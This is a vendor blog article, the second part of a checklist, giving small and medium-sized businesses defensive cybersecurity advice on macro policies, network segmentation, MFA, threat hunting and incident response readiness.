Checklist "Cybersecurity for SMEs": Valuable tips - Part 2
by Tina Siering
After presenting the first five of the most important cyber security measures for SMEs in the first part of our checklist, we follow up in the second part: We present five more essential measures that will help your company to increase security in cyberspace and strengthen resilience against current and future threats. Let's dive into the topic together and bring your company up to speed on cyber security.
Recommended reading: Part 1 of the series of articles.
Measure 6: Disable macros - close ransomware entry gates in advance.
Disabling macros is an effective and cost-free way to protect your business from ransomware attacks. Macros are small programs that can be embedded in files such as Word, Excel, PowerPoint or PDF to automate processes. While this feature can be useful, it also provides a way for cybercriminals to infiltrate and control IT systems.
For files with macros, programmes usually ask the user for permission to run them. The problem with this is that many users are not in a position to judge the legitimacy of a file that comes from a supposedly trustworthy email sender, for example.
To minimise the risk, the decision as to whether a macro may be executed should not be left to the users. Instead, it is advisable to generally prohibit the execution of macros, for example via Windows group policies.
If macros are nevertheless needed in your company, the administrator can sign the required macros and exceptionally allow their execution, while all others remain prohibited. This protection mechanism can be set up with a few clicks and offers significant added value for your company's cyber security.
Measure 7: Effective separation of IT domains as the key to greater cybersecurity
It is crucial to separate certain IT applications from the internet to minimise risks such as data exfiltration, unauthorised intrusion, identity theft and misuse of company systems. To do this, it is important to set up individual user accounts for each employee and avoid group accounts. When surfing the internet, it is important to only use user accounts without administrator rights to reduce the risk of system takeover by attackers. Normal users must not be given administrator rights, as this increases the risk of malicious code being introduced.
Administrator rights remain with administrators and should only be used for system configurations and software installations. In addition, access rights of employees who leave the company must be revoked in such a way that neither they nor third parties can continue to use these access rights.
For SMEs with a larger number of employees, it is advisable to take additional measures in the area of segmentation. These include the standard prohibition of connections between workstation computers in order to prevent the spread of malware, if necessary. The administration of the company network should be carried out exclusively via dedicated PCs and administrator accounts.
Another important measure is to divide IT activities into different network zones (e.g. internal servers, servers connected to the internet, workstation computers, administration zone, industrial systems, etc.). This can be achieved through physical or virtualised filters. The strict separation of IT areas contributes significantly to improving cyber security in SMEs and minimises potential attack surfaces for cyber criminals.
Measure 8: Basic IT security measures
Implementing basic IT security measures is essential for SMEs. These include anti-virus programmes and firewalls, which must always be kept up to date to ensure they provide the required protection. Virtual private networks (VPNs) also provide a secure communication channel by establishing encrypted connections between network devices and the internet. Anti-phishing measures protect against fraudulent emails and websites that aim to grab sensitive data.
Another important protection mechanism is multi-factor authentication (MFA), which requires two or more credentials to access a system or verify transactions. The factors used can be based on physical entities (e.g. mobile phones or smart cards), biometric features or secret knowledge and must always function independently of each other. Common combinations are, for example, password + identifier (sent to the smartphone), PIN + identity proof (via a smart card), password + security question or identity card + iris scan.
Measure 9: Proactive attack detection by means of cyber threat hunting - a crucial, additional layer of security.
The key difference to traditional IT security measures, such as a firewall or antivirus software, is the active approach - traditional security tools, on the other hand, only offer passive protection. These are suitable for warding off general and known threats. Cyber threat hunting, on the other hand, is an active process. With the help of proactive and iterative searches, one's own network is permanently monitored and proactively searched for indicators of compromise (IOCs). This is done with the help of special software that carries out in-depth network analyses.
The idea behind this is to identify conspicuous behaviour patterns at an early stage and in this way immediately detect unauthorised intruders in the network. This enables immediate intervention and significantly reduces the time that attackers spend undetected in your network.
Existing techniques are not replaced, but supplemented. In combination, this gives you a significantly higher level of IT security. The key advantage of actively searching for threats is that intruders are detected in your network before they can cause damage, because it still takes an average of six months before a compromise is identified in the network.
Especially for small security teams, an outsourced Security Operations Centre (SOC), for example Allgeier secion's Active Cyber Defense (ACD), can be an effective and cost-efficient way to increase network security while relieving internal IT security teams.
Measure 10: Incident Response Readiness - The Basis for Successful Attack Defence
In order to remain capable of acting in an emergency, companies need well-rehearsed incident response readiness processes. Their effectiveness should be analysed on the basis of the ability to defend against attacks and optimised by cyber security consultants in the form of a catalogue of measures. The earlier and more planned the right measures are taken, the better potential damage can be limited.
A comprehensive incident response readiness strategy includes detailed guidelines and processes covering the following areas:
- Organisation: clearly defining roles, responsibilities and accountabilities in the event of a cyber-attack.
- Guidelines and standards: Compliance with legal and regulatory requirements regarding response time and reporting channels.
- Technology: Effective tools for permanent and immediate detection of cyber threats (threat intelligence).
- Processes: Clear procedures for various emergency scenarios and instructions for employees in the event of a security incident.
- Training: Ensuring the necessary expertise and regular testing of security processes at technical and management level.
- Assessment: Continuous review of the functionality of the defence measures by cyber security experts for threat scenarios and incident response.
Whether your company has the necessary prerequisites for optimal security incident management should be answered by a comprehensive analysis and continuous improvement of the incident response readiness strategy.
Conclusion
SME cybersecurity can be significantly improved through targeted measures such as disabling macros, segregating IT domains, comprehensive IT baseline protection, early attack detection and a solid incident response readiness strategy. By implementing these essential security practices, businesses can increase their resilience to cyber threats and protect business-critical data and systems.